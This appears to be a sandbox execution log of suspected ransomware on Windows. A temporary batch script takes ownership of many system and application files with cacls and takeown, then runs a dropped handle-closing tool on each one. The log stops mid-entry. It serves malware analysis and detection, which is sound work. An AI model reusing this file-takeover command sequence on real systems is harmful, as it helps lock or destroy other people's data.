C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Program Files\Windows Security\BrowserCore\manifest.json""2⤵PID:988
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Security\BrowserCore\manifest.json" /E /G Admin:F /C3⤵PID:1056
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Security\BrowserCore\manifest.json"3⤵PID:1904
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "manifest.json" -nobanner3⤵PID:3716
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "manifest.json" -nobanner4⤵
- Executes dropped EXE
PID:4508
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:396
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H""2⤵PID:3164
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H" /E /G Admin:F /C3⤵PID:2000
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H"3⤵
- Modifies file permissions
PID:1252
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "Identity-H" -nobanner3⤵PID:2524
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "Identity-H" -nobanner4⤵
- Executes dropped EXE
PID:1408
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:404
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V""2⤵PID:4044
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V" /E /G Admin:F /C3⤵PID:2140
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V"3⤵PID:2080
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "Identity-V" -nobanner3⤵PID:1312
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "Identity-V" -nobanner4⤵
- Executes dropped EXE
PID:3340
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3408
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""2⤵PID:2376
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵PID:2552
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"3⤵PID:1216
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵PID:1668
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:4080
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:332
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui""2⤵PID:1880
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵PID:276
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui"3⤵
- Modifies file permissions
PID:1720
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵PID:3096
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵PID:396
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4268
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.db872d3e-0426-4eca-b85d-7591529a3211.1.etl""2⤵PID:4496
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.db872d3e-0426-4eca-b85d-7591529a3211.1.etl" /E /G Admin:F /C3⤵PID:4680
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.db872d3e-0426-4eca-b85d-7591529a3211.1.etl"3⤵
- Modifies file permissions
PID:3644
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "NotificationUxBroker.db872d3e-0426-4eca-b85d-7591529a3211.1.etl" -nobanner3⤵PID:3724
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "NotificationUxBroker.db872d3e-0426-4eca-b85d-7591529a3211.1.etl" -nobanner4⤵PID:3080
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4448
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui""2⤵PID:2384
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵PID:2008
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui"3⤵PID:2364
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵PID:3164
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵PID:1292
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:444
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe""2⤵PID:2476
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C3⤵PID:1232
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"3⤵PID:1916
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "ImagingDevices.exe" -nobanner3⤵PID:2848
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "ImagingDevices.exe" -nobanner4⤵PID:4284
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1216
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui""2⤵PID:896
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵PID:2708
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui"3⤵
- Modifies file permissions
PID:332
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵PID:2644
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵PID:2756
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3392
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui""2⤵PID:3656
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵PID:1880
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui"3⤵
- Modifies file permissions
PID:1904
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵PID:1012
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵PID:4288
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2460
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.98508efd-0722-4d60-b35c-daab6c4467d0.1.etl""2⤵PID:3968
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.98508efd-0722-4d60-b35c-daab6c4467d0.1.etl" /E /G Admin:F /C3⤵PID:712
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.98508efd-0722-4d60-b35c-daab6c4467d0.1.etl"3⤵PID:2764
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "MoUsoCoreWorker.98508efd-0722-4d60-b35c-daab6c4467d0.1.etl" -nobanner3⤵PID:2020
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "MoUsoCoreWorker.98508efd-0722-4d60-b35c-daab6c4467d0.1.etl" -nobanner4⤵PID:4960
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4740
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\ProgramData\USOShared\Logs\System\WuProvider.8147676f-7ebb-4222-babe-ad996498dac1.1.etl""2⤵PID:4544
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\WuProvider.8147676f-7ebb-4222-babe-ad996498dac1.1.etl" /E /G Admin:F /C3⤵PID:808
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\WuProvider.8147676f-7ebb-4222-babe-ad996498dac1.1.etl"3⤵
- Modifies file permissions
PID:5100
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "WuProvider.8147676f-7ebb-4222-babe-ad996498dac1.1.etl" -nobanner3⤵PID:4788
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "WuProvider.8147676f-7ebb-4222-babe-ad996498dac1.1.etl" -nobanner4⤵PID:4044
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3472
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui""2⤵PID:4948
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵PID:2512
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui"3⤵
- Modifies file permissions
PID:2264
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵PID:3840
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵PID:1356
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:204
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui""2⤵PID:1752
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵PID:4080
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui"3⤵
- Modifies file permissions
PID:2416
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵PID:3532
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵PID:4504
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2000
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Program Files (x86)\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui""2⤵PID:4372
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵PID:4864
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui"3⤵PID:4268
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵PID:3628
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵PID:3824
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3316
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui""2⤵PID:4628
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵PID:4428
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui"3⤵
- Modifies file permissions
PID:2412
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵PID:3808
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵PID:2340
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1608
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Program Files (x86)\Windows Mail\wab.exe""2⤵PID:1428
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\wab.exe" /E /G Admin:F /C3⤵PID:1728
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\wab.exe"3⤵
- Modifies file permissions
PID:4284
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "wab.exe" -nobanner3⤵PID:2476
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "wab.exe" -nobanner4⤵PID:1216
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:288
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui""2⤵PID:1668
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵PID:4948
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui"3⤵
- Modifies file permissions
PID:3052
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵PID:3740
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵PID:3584
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4464
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui""2⤵PID:1940
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵PID:3392
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui"3⤵
- Modifies file permissions
PID:1012
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵PID:4320
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵PID:4660
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3216
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.f17b2ded-6898-4cb9-9f92-dd9cc093201c.1.etl""2⤵PID:3680
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.f17b2ded-6898-4cb9-9f92-dd9cc093201c.1.etl" /E /G Admin:F /C3⤵PID:2764
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.f17b2ded-6898-4cb9-9f92-dd9cc093201c.1.etl"3⤵
- Modifies file permissions
PID:2324
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "UpdateSessionOrchestration.f17b2ded-6898-4cb9-9f92-dd9cc093201c.1.etl" -nobanner3⤵PID:1408
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "UpdateSessionOrchestration.f17b2ded-6898-4cb9-9f92-dd9cc093201c.1.etl" -nobanner4⤵PID:2020
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2368
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""2⤵PID:4740
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵PID:1232
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"3⤵
- Modifies file permissions
PID:4304
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵PID:3552
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵PID:4844
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1168
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Program Files (x86)\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui""2⤵PID:2552
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵PID:2708
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui"3⤵
- Modifies file permissions
PID:3472
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵PID:4308
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵PID:332
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1928
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.d8c69359-837a-469e-8c32-ea039ba732ac.1.etl""2⤵PID:2756
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.d8c69359-837a-469e-8c32-ea039ba732ac.1.etl" /E /G Admin:F /C3⤵PID:2744
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.d8c69359-837a-469e-8c32-ea039ba732ac.1.etl"3⤵PID:204
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "UpdateSessionOrchestration.d8c69359-837a-469e-8c32-ea039ba732ac.1.etl" -nobanner3⤵PID:2148
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "UpdateSessionOrchestration.d8c69359-837a-469e-8c32-ea039ba732ac.1.etl" -nobanner4⤵PID:3644
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3624
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.a9dd1a22-81be-4049-bb19-ab0498fe0fec.1.etl""2⤵PID:2000
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.a9dd1a22-81be-4049-bb19-ab0498fe0fec.1.etl" /E /G Admin:F /C3⤵PID:3656
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.a9dd1a22-81be-4049-bb19-ab0498fe0fec.1.etl"3⤵
- Modifies file permissions
PID:2896
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "NotificationUxBroker.a9dd1a22-81be-4049-bb19-ab0498fe0fec.1.etl" -nobanner3⤵PID:2376
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "NotificationUxBroker.a9dd1a22-81be-4049-bb19-ab0498fe0fec.1.etl" -nobanner4⤵PID:4448
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4380
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""2⤵PID:4680
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵PID:3968
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"3⤵PID:3824
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵PID:3628
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵PID:3676
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3304
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui""2⤵PID:4628
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵PID:1728
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui"3⤵
- Modifies file permissions
PID:808
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵PID:1148
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵PID:2264
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4544
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat""2⤵PID:1428
-
